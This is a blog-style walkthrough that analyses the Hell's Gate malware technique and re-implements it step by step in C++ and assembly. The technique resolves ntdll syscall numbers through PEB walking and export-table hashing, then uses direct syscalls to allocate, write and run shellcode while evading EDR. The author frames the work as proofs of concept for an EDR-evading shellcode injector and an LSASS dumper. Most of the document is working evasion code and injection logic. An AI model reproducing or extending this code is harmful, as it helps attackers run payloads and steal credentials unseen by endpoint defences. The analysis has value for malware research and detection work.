The following writeup is a my analysis of the Hells Gate malware. This malware strain contains a technique that performs syscalls on the Windows operating system in order to evade EDR detection.
Upon completion of my analysis, I developed my own implementation in C++ that uses existing syscall instructions within ntdll.dll and a custom hashing technique to evade the modern methods of detection for these types of techniques.
There are further optimizations that can be added to the technique, however for the sake of time, two PoC’s were developed.
- In the year 2024, a basic shellcode injector that evades modern EDR
- In 2024 an LSSAS dumper that evades Windows Defender.
The LSASS dumper may be optimized to evade EDR however I leave this as an exercise to the reader.
Table of Contents #
Disclaimer #
Copyright 2024 Milton Valencia
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Understanding The Malware #
So I downloaded the source code for this technique from am0nsec. I wanted to break down this code line-by-line starting with the main function.
INT wmain() {
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
return 0x1;
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
return 0x1;
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
return 0x1;
Payload(&Table);
return 0x00;
}
So it looks like the first step is to “Get NTDLL”.
Get NTDLL Module Entry #
To get a better understanding of how this was achieved I used the following PoC:
int main()
{
PTEB pTeb = GetThreadEnvironmentBlock();
PPEB pPeb = pTeb->ProcessEnvironmentBlock;
std::cout << "[*] Testing on OS Version: " << pPeb->OSMajorVersion << std::endl;
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pPEB->LoaderData->InMemoryOrderModuleList.Flink - 0x10);
std::cout << "[*] pLdrDataEntry: 0x" << std::hex << (uint64_t)pLdrDataEntry << std::endl;
getchar();
return 0;
}
For the sake of brevity structures will only be brought up when relevant. Once ran, we see the following output but what is this?
C:\Users\developer\Desktop>hg.exe
[*] Testing on OS Version: 10
[*] pLdrDataEntry: 0x26f94d06020
If we break into WinDbg, we can get to the PEB
using !process 0 0 hg.exe
. The main thing we want to look at here is the InMemoryOrderModuleList
.
We can see that this is very similar to our output and if we subtract 0x10 from this address it’s exactly the same.
At first glance, this does not tell us much. However, each list entry is actually wrapped in a LDR_DATA_TABLE_ENTRY
. So, we can get more context by dumping the structure itself located in the FLINK
pointer.
In the output above we can see that this is in fact the entry to the NTDLL module. The steps are basically as follows in this line of code:
- Use the GS register to get a pointer to the TEB
- The TEB contains a pointer to the PEB
- Use the PEB to get a pointer to the PEB_LDR_DATA structure
- Using the PEB_LDR_DATA structure we can get to the InMemoryOrderModuleList
Let’s implement a PoC to traverse this using doubly-linked list using our new found knowledge. Since we have no guarantee that ntdll.dll
will always be loaded at offset -0x10
.
int main()
{
PTEB pTeb = NULL;
PPEB pPeb = NULL;
PLIST_ENTRY pEntry = NULL;
PLIST_ENTRY pHeadEntry = NULL;
PPEB_LDR_DATA pLdrData = NULL;
PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
PLDR_DATA_TABLE_ENTRY pLdrDataTableEntry = NULL;
/* Get the TEB */
pTeb = GetThreadEnvironmentBlock();
/* Get the PEB */
pPeb = pTeb->ProcessEnvironmentBlock;
/* OS Version Detection Omitted */
std::cout << "[*] Testing on OS Version: " << pPeb->OSMajorVersion << std::endl;
/* Obtain a pointer to the structure that contains information about the loaded modules for a given process */
pLdrData = pPeb->LoaderData;
/* Get the pointer to the InMemoryOrderModuleList which is a doubly-linked list that contains
the loaded modules for the process */
pHeadEntry = &pLdrData->InMemoryOrderModuleList;
/* Iterate over the InMemoryOrderModuleList */
std::wcout << L"\nInMemoryOrderModuleList\n" << std::endl;
std::wcout << L"\tBase\t\t\tModule\n" << std::endl;
for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink)
{
pLdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pEntry;
std::wcout << L"\t"
<< std::hex << pLdrDataTableEntry->DllBase << L"\t"
<< pLdrDataTableEntry->FullDllName.Buffer
<< std::endl;
}
getchar();
return 0;
}
Nice we can see that our PoC works:
However, we still need to get it to return the original value from the PoC which is a pointer to the LIST_ENTRY. So, let’s modify our code once more, creating a single function to obtain the entry dynamically.
When writing this I observed that the last PoC (we wrote) was incorrect for properly parsing each entry. To properly reach an LDR_DATA_TABLE_ENTRY, we must subtract 0x10 from the module found since the Flink address IS NOT the first member of the structure.
PLDR_DATA_TABLE_ENTRY GetNtdllTableEntry()
{
PTEB pTeb = NULL;
PPEB pPeb = NULL;
DWORD dwModuleHash = 0x00;
DWORD dwDllNameSize = 0x00;
DWORD dwRorOperations = 0x00;
PLIST_ENTRY pEntry = NULL;
PLIST_ENTRY pHeadEntry = NULL;
PPEB_LDR_DATA pLdrData = NULL;
PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
PLDR_DATA_TABLE_ENTRY pLdrDataTableEntry = NULL;
/* Get the TEB */
pTeb = GetThreadEnvironmentBlock();
/* Get the PEB */
pPeb = pTeb->ProcessEnvironmentBlock;
/* Obtain a pointer to the structure that contains information about the loaded modules for a given process */
pLdrData = pPeb->LoaderData;
/* Get the pointer to the InMemoryOrderModuleList which is a doubly-linked list that contains
the loaded modules for the process */
pHeadEntry = &pLdrData->InMemoryOrderModuleList;
/* Iterate over the InMemoryOrderModuleList and identify NTDLL */
for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink)
{
/* If I understood correctly we must subtract 16 from the ntdll.dll entry in the InMemoryModuleList. This
is neccessary because the Flink is not the first member of the LDR_DATA_TABLE_ENTRY structure, so when
subtracting 0x10 we get the start of the structure for ntdll.dll */
pLdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)((std::int64_t)pEntry-0x10);
/* Calculate a hash for the given DLL name */
dwDllNameSize = (pLdrDataTableEntry->BaseDllName.Length) / sizeof(wchar_t);
dwRorOperations = 0x00;
dwModuleHash = 0x00;
/* Hash the DLL name for identification */
for (int i = 0; i < dwDllNameSize; i++)
{
dwModuleHash = dwModuleHash + ((uint32_t)pLdrDataTableEntry->BaseDllName.Buffer[i]);
if (dwRorOperations < (dwDllNameSize - 1)) {
dwModuleHash = _rotr(dwModuleHash, 0xd);
}
dwRorOperations++;
}
std::wprintf(L"[*] Found %ws (HASH: 0x%lx, ENTRY: 0x%lx)\n", pLdrDataTableEntry->BaseDllName.Buffer,
dwModuleHash,
(std::int64_t)pLdrDataTableEntry);
if (dwModuleHash == NTDLL_HASH)
{
std::wprintf(L"[+] Located ntdll: 0x%x\n", pLdrDataTableEntry);
break;
}
}
return pLdrDataTableEntry;
}
Getting the Export Address Table (EAT) of NTDLL #
The next step we see is getting the Export Address Table of NTDLL.
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
Now looking at the source this function was created by the author of Hells Gate, let’s look at that source.
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
// Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
// Get NT headers
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
Let’s take a closer look at this in WinDbg.
Once we have the DataDirectory we can obtain the VirtualAddress of the Export Address Table from the first index in the DataDirectory. We can confirm this with !dh ntdll.dll -f
.
Let’s go ahead and quickly re-implement this.
VOID GetExportAddressTable(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
{
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
PIMAGE_NT_HEADERS pImageNtHeaders = NULL;
/* Verify that the DOS header is valid */
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
std::wcout << L"[-] Failed to detect DOS header\n";
return;
}
/* Get a pointer to the IMAGE_NT_HEADER structure of the module (ntdll.dll) */
pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
std::wcout << L"[-] Failed to obtain pointer to IMAGE_NT_HEADERS\n";
return;
}
/* Obtain the address of the EAT */
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return;
}
Understanding GetVxTableEntry() #
The next step we see is a declaration of a VX_TABLE
structure along with a call to the function GetVxTableEntry()
.
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Lets start breaking down the GetVxTableEntry()
function. These first three lines
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
Sadly, this structure is not open source. Luckily, I was able to find the structure definition on ReactOS as well as malware.in. Using this we can manually verify this to be true using WinDbg.
typedef struct _IMAGE_EXPORT_DIRECTORY
{
DWORD Characteristics;
DWORD TimeDateStamp;
WORD MajorVersion;
WORD MinorVersion;
DWORD Name;
DWORD Base;
DWORD NumberOfFunctions;
DWORD NumberOfNames;
PDWORD *AddressOfFunctions;
PDWORD *AddressOfNames;
PWORD *AddressOfNameOrdinals;
}
IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
Using this structure we can start to map how this structure is used by the malware.
The next lines of code we see a pretty gnarly for-loop.
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
};
}
}
Let’s break down the first few lines.
- First, we see that we are iterating over the number of names in the IMAGE_EXPORT_DIRECTORY (
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
) - Then we iterate over each function name just as we saw in WinDbg
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
- Next, we get the function addresses as prevously seen
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
If we re-implement this in our PoC we see the following:
The next line is an if
condition. Intrestingly, we see the introduction of a new function djb2()
.
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
In addition, we once more see our previously set dwHash. Now from my perspective this does not appear to be necessary. We could use any other hashing function… but for now I’ll leave this function as designed.
The next block of code is rather “large”, we see a few checks then we see we ultimately look for opcodes 0x4c, 0x8bx 0xd1, 0xb8, 0x00, and 0x00
.
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
If we look at this in sickle
this is indeed mov r10, rcx
. However, based on the output we may be able to just use 0x4c, 0x8b, and 0xd1
.
┌──(wetw0rk㉿kali)-[/opt/Sickle/src]
└─$ python3 sickle.py -m asm_shell -f c
[*] ASM Shell loaded for x64 architecture
sickle > d 4c8bd1b80000
4c8bd1 -> mov r10, rcx
If we update our PoC once more.
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
WORD cx = 0x00;
WORD cw = 0x00;
PCHAR pczFunctionName = NULL;
PVOID pFunctionAddress = NULL;
for (cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++)
{
pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
/* We found the target function */
if (djb2((PBYTE)pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
while (TRUE) {
printf("[*] Found target function: %s (0x%p)\n", pczFunctionName, pFunctionAddress);
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
printf("[+] Syscall found @{0x%p}\n", (PVOID)((intptr_t)pFunctionAddress + cw));
getchar();
}
cw++;
}
}
}
return TRUE;
}
We can see that this syscall is successfully located the instructions.
Finally, we see that if we locate this sequence of bytes / instructions we write the syscall to the VX_TABLE
structure.
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
Not sure exactly why we must store it like this (we may be able to re-implement it), however in WinDBG we can see when we read from this value it’s pretty straight-forward.
We have now implemented our own version of this function to have an understanding of its underlying operations.
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
BYTE high = 0x00;
BYTE low = 0x00;
WORD cx = 0x00;
WORD cw = 0x00;
PCHAR pczFunctionName = NULL;
PVOID pFunctionAddress = NULL;
for (cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++)
{
pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
/* We found the target function */
if (djb2((PBYTE)pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
/* Quick and dirty fix in case the function has been hooked */
while (TRUE) {
/* Check if a syscall instruction has been reached, if so we are too deep into the function */
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
/* Check if a ret instruction has been reached, if so we read to deep into the function */
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
high = *((PBYTE)pFunctionAddress + 5 + cw);
low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
printf("[*] %s syscall start found @{0x%p}\n", pczFunctionName, (PVOID)((intptr_t)pFunctionAddress + cw));
printf("\t[*] High: 0x%x\n", high);
printf("\t[*] Low: 0x%x\n", low);
printf("\t[*] Syscall: 0x%x\n", pVxTableEntry->wSystemCall);
break;
}
cw++;
}
}
}
return TRUE;
}
With that we can introduce the rest of the main function.
vxTable.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtAllocateVirtualMemory))
return 0x01;
vxTable.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtCreateThreadEx))
return 0x1;
vxTable.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtProtectVirtualMemory))
return 0x1;
vxTable.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pNtdllEntry->DllBase, pImageExportDirectory, &vxTable.NtWaitForSingleObject))
return 0x1;
Understanding Payload() #
Finally, we’re at the final function call in the main()
function.
Payload(&Table);
We can see that this is, yet another custom function implemented by the author. However, we see three additional custom functions HellsGate
, HellsDescent
, and VxMoveMemory
.
BOOL Payload(PVX_TABLE pVxTable) {
NTSTATUS status = 0x00000000;
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
// Allocate memory for the shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
// Write Memory
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
// Change page permissions
ULONG ulOldProtect = 0;
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
// Create thread
HANDLE hHostThread = INVALID_HANDLE_VALUE;
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
// Wait for 1 seconds
LARGE_INTEGER Timeout;
Timeout.QuadPart = -10000000;
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
status = HellDescent(hHostThread, FALSE, &Timeout);
return TRUE;
}
Understanding HellsGate #
We can go ahead and ignore the underlying operations of VxMoveMemory
as this is just a custom implementation of memcpy()
. However we can start to understand the underlying operations of the first call - HellsGate.
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
Let’s set a DebugBreak();
just before this call.
DebugBreak();
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
Once ran in WinDbg, we see that we’re about to enter the call to HellsGate.
Once in, we can see that we’ll be executing the syscalls we dynamically resolved.
Understanding HellsDescent #
At this point our Assembler stub holds the syscall number for NtAllocateVirtualMemory
within the .data
section of the binary. The next step is to call HellsDescent where we actually execute the syscall.
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
When we get to HellsDescent we can see that we are moving RCX into R10. Now normally when issuing a function call the arguments are sent in the order RCX, RDX, R8, R9 and any additional arguments on the stack at offset 0x20
. If we look at the function prototype for NtAllocateMemory() we quickly see that all these arguments simply cannot be stored within RCX unless RCX is a pointer to an object.
__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
[in] HANDLE ProcessHandle,
[in, out] PVOID *BaseAddress,
[in] ULONG_PTR ZeroBits,
[in, out] PSIZE_T RegionSize,
[in] ULONG AllocationType,
[in] ULONG Protect
);
This is further confirmed when dumping the register states.
At this point we can say we have a solid idea on how HellsGate operates :)
- Parse the InMemoryOrderModuleList and obtain the base address of NTDLL
- Obtain the address of the Export Address Table for NTDLL
- Parse the EAT in search for target syscalls
- Execute syscalls
- Profit
PoC | GTFO (Ezekiels Wheel) #
We have learned the inner mechanisms of Hell’s Gate operations, now we can use this newfound knowledge to write our own implementation. Although optimized for evasion (Ezekiels Wheel), it’s important to know this would not have been possible without understanding the fundamentals of Windows Syscalls.
The changes in Ezekiels Wheel are as follows:
- Dynamic syscall search, we do not rely on having hardcoded syscall instructions in our code
- Code re-use, we leverage existing ntdll.dll syscalls so EDR’s believe operations to be normal
- We have re-implemented our own hashing technique when searching for function routines
- We gave it a cool name ;)
Ezekiel 10:10 As for their appearance, all four looked alike—as it were, a wheel in the middle of a wheel.
Sources #
http://malwareid.in/unpack/unpacking-basics/export-address-table-and-dll-hijacking
https://doxygen.reactos.org/de/d20/struct__IMAGE__EXPORT__DIRECTORY.html
https://learn.microsoft.com/en-us/windows/win32/api/ntdef/nf-ntdef-containing_record
https://davidesnotes.com/articles/1/?page=1#
https://gist.github.com/Spl3en/9c0ea329bb7878df9b9b
https://redops.at/en/blog/exploring-hells-gate
http://www.rohitab.com/discuss/topic/42191-c-peb-ldr-inmemoryordermodulelist-flink-dllbase-dont-get-the-good-address/
https://www.vergiliusproject.com/
https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/
https://www.youtube.com/watch?v=elA_eiqWefw&t=2s